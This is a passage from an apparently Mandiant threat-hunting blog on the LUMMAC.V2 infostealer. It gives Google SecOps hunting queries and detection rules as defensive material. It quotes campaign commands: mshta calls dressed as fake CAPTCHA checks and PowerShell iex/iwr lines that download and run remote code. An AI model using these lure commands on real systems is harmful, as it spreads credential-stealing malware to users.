Having dissected the network communication, data staging, and exfiltration techniques employed by LUMMAC.V2 in Part 2, we now transition to Part 3.

Extracted configuration data

This configuration is from the LUMMAC.V2 sample https://www.virustotal.com/gui/file/9b5261901aab3f45a0381d39b0f535853fdcae74c7f25121efda70bb89b062e2/detection. 

Table 3: File Paths and Configurations

Threat Hunting & Detection in Google SecOps

Hunting Opportunities

Mandiant Threat Defense surfaces otherwise undetected malicious activity by employing a detection strategy that correlates  both strong signals (alerts) and weak signals (security relevant events that are not inherently malicious)) to uncover evidence of attacker activity. These signals are used to classify and evaluate petabytes of telemetry data into enriched and highly curated cases that require analyst review. 

Google SecOps customers can use the following Yara-L 2.0 queries to hunt for distribution and execution of infostealers like LUMMAC.V2 and other malware using similar tactics on events normalized to UDM. These queries rely on Windows process activity logs, which can be sourced from Windows Event Logs and/or Endpoint Detection and Response (EDR) telemetry.

• Microsoft HTML Application Host executing a remotely-hosted file - Distribution campaigns leading to LUMMAC.V2 and other malware have been observed tricking users into executing mshta.exe to fetch a file from a URL and execute its contents. Use the following query to hunt for such activity in Google SecOps. There may be instances of legitimate use of mshta.exe in your environment, which can be tuned by adding exclusions to and re-running the query or by using the Hide or Pivot functionality on the query results.

metadata.event_type = "PROCESS_LAUNCH" AND
(
  (
  principal.process.file.full_path = /mshta/ nocase AND
  principal.process.command_line = /http?:\/\// nocase
  ) OR
  (
  target.process.file.full_path = /mshta/ nocase AND
  target.process.command_line = /http?:\/\// nocase
  )
) AND
not target.process.command_line = /<your exclusions here>/ nocase

These events map to MITRE ATT&CK Technique T1218.005 - System Binary Proxy Execution: Mshta. Examples of commands which download LUMMAC.V2 are shown below. Note the use of  Greek lowercase letters omicron and tau in “rοbοτ” instead of standard Latin characters to evade hard-coded detection logic.

• "C:\WINDOWS\system32\mshta.exe" hxxps://axilec.]shop/<random name>.mp3 # I am not a rοbοτ: CΑPΤCΗΑ Vеrіficατιοn ID: <numbers>
• "mshta.exe" hxxps://cdn5-dispatcher-mp.oss-ap-northeast-2.aliyuncs>.]com/<random name>.mp3 # UІD:  <numbers> – Ι аm not а roƄot – Vеrіfу СΑРΤСНА ѕеquеnсе

• Downloading file using Invoke-Expression and Invoke-WebRequest cmdlets - Mandiant has observed LUMMAC.V2 distribution campaigns designed to trick users into executing PowerShell cmdlets that download second stage malware components. Use the following query to hunt for suspicious PowerShell activity with Base64-encoded arguments in Google SecOps: 

metadata.event_type = "PROCESS_LAUNCH" AND
(
  (
  target.process.command_line = /iex/ AND
  target.process.command_line = /iwr/ AND
  target.process.command_line = /http/
  ) OR
  (
  target.process.command_line = /aQBlAHgA/ AND
  target.process.command_line = /AGkAdwByAC/ AND
  target.process.command_line = /aAB0AHQAcAA/
  ) OR
  (
  target.process.command_line = /aWV4/ AND
  target.process.command_line = /aXdy/ AND
  target.process.command_line = /aHR0cA/
  )
)

These events map to MITRE ATT&CK Technique T1105 - Ingress Tool Transfer and MITRE ATT&CK Technique T1059.001 - Command and Scripting Interpreter: PowerShell. Base64-decoded commands which download LUMMAC.V2 are shown below.

• iex (iwr http://<IP address>:5001/get_txt -UseBasicPARSING).Content
• iwr https://<Malicious.domain>/w/str.txt -UseBasicParsing|iex ## Verification ID 389234 

• Concatenating multiple files using the Windows Command Prompt - LUMMAC.V2  reconstructs malicious files on hosts by concatenating separate fragments using the copy command.

Since concatenating files in this manner is likely rare in your environment, use the UDM query below in Google SecOps to identify instances of this activity:

metadata.event_type = "PROCESS_LAUNCH" AND
target.process.command_line = /cmd\s+\/c/ nocase AND
target.process.command_line = /copy\s+\/b.+\+.+\+/ nocase

These events map to MITRE ATT&CK Technique T1059.003 - Command and Scripting Interpreter: Windows Command Shell. Examples of LUMMAC.V2 commands which concatenate randomly-named files are shown below.

• cmd /c copy /b 113404\Opened.com + Merger + Progressive + Preference + Illustrations + Milk + Utility + Her + Review + Polish + Bra + Snapshot 113404\Opened.com
• cmd /c copy /b ..\Shadow + ..\Finnish + ..\Ambien + ..\Reached + ..\Dana + ..\Worth + ..\Access + ..\Vocals + ..\Clocks + ..\Aluminium + ..\Tries + ..\Calm + ..\Unlike s

• PowerShell launching a process located in the AppData\Roaming directory - When malicious files must be written to disk, threat actors often leverage Windows locations like AppData\Roaming, AppData\Local, and AppData\LocalLow as administrator privileges are not required to write to these locations. The PowerShell execution events map to MITRE ATT&CK Technique T1059.001 - Command and Scripting Interpreter: PowerShell.

Use the UDM query below in Google SecOps to identify PowerShell launching processes in AppData\Roaming:

metadata.event_type = "PROCESS_LAUNCH" AND
principal.process.file.full_path = /powershell|pwsh/ nocase AND
target.process.file.full_path = /appdata\\roaming/ nocase AND
target.process.command_line = /\\AppData\\Roaming(\\f^\\\/]+){0,}\\=^\\\/]+\.exe"?\s*$/ nocase

An example of such an event from a LUMMAC.V2 compromise is PowerShell executing C:\Users\<user>\AppData\Roaming\<Randomly-named subfolder>\MyDockFinder.exe on a host, as described above in the “Variation 2: Process Hollowing” section. 

• PowerShell creating registry Run key persistence for binary in AppData - Malware can leverage registry Run keys for persistence, with the registry value data pointing to a binary in directory locations commonly used by threat actors for staging files. These events map to MITRE ATT&CK Technique T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder.

Use the UDM query below in Google SecOps to identify such events:

metadata.event_type = "REGISTRY_CREATION" AND
principal.process.file.full_path = /powershell|pwsh/ nocase
target.registry.registry_key = /Software\\Microsoft\\Windows\\CurrentVersion\\Run/ nocase AND
target.registry.registry_value_data = /\\AppData\\Roaming(\\p^\\\/]+){0,}\\ ^\\\/]+\.exe/ nocase

Detections

Users can create custom single or multi-event YL2 rules within Google SecOps to detect LUMMAC.V2 malware activity.

• This rule detects potential process hollowing on BitLockerToGo.exe binary  

rule BITLOCKERTOGO_PROCESSS_EXECUTION_METHODOLOGY {
    meta:
author = "Mandiant"
        description = "This rule is designed to detect the execution of the BitLockerToGo.exe process on the host. While this process can be used for legitimate purposes, malware families like LUMMAC have previously used it as a target for process hollowing. This is associated with MITRE ATT&CK (r) Tactic(s): Defense Evasion, Privilege Escalation and Technique(s): T1218, T1055.012"

        mitre_technique_name = "System Binary Proxy Execution"
        mitre_technique = "T1218"
        mitre_tactic_name = "Defense Evasion"
        platform = "Windows"
        severity = "High"
        purpose = "Mission to identify threat actor abuse of trusted operating system tools/binaries to execute malicious code"
type = "hunt"
    events:
      
            $e.metadata.event_type = "PROCESS_LAUNCH"
        (
            re.regex($e.target.process.command_line, `(\\|")BitLockerToGo\.exe`) nocase or
            re.regex($e.target.process.file.full_path, `BitLockerToGo\.exe`) nocase
        )

        not $e.principal.process.file.full_path = /(^|\\)explorer.exe$/ nocase
        re.regex($e.principal.process.parent_process.file.full_path, `\\AppData\\Roaming\\`) nocase
    outcome:
        $hostname = $e.principal.hostname
    condition:
        $e
}

• This rule detects processes with command lines utilizing a file with a .pif extension that also makes network connections. 

rule PROCESS_WITH_PIF_EXTENSION_NETWORK_CONNECTIONS_METHODOLOGY {
    meta:
author = "Mandiant"
        description = "This rule is designed to detect when a process with a .PIF (Program Information Files on Microsoft Windows computers) file extension spawns network events. This technique has been linked to malware compromises involving Infostealer. Determine if the observed process and network traffic are malicious."
        mitre_technique_name = "Application Layer Protocol"
        mitre_technique = "T1071.001"
        mitre_tactic_name = "Command And Control"
        platform = "Windows"
        severity = "Critical"
        purpose = "Mission to identify threat actors establishing command and control using web protocols"
type = "hunt"
    events:
        (
            $e.metadata.event_type = "NETWORK_CONNECTION" or
            $e.metadata.event_type = "NETWORK_DNS" or
            $e.metadata.event_type = "NETWORK_HTTP"
        ) and
        re.regex($e.principal.process.file.full_path, `\.pif$`) nocase


    outcome:
        $hostname = $e.principal.hostname
    condition:
        $e
}

I would like to extend my thanks to Tina Johnson and Mustafa Nasser from the Mandiant FLARE Team and all the reviewers for their valuable contributions to this blog post.

Other entries in Finding Malware: Unveiling LUMMAC.V2 with Google Security Operations

Finding Malware: Unveiling LUMMAC.V2 with Google Security Operations Part 1

Finding Malware: Unveiling LUMMAC.V2 with Google Security Operations Part 2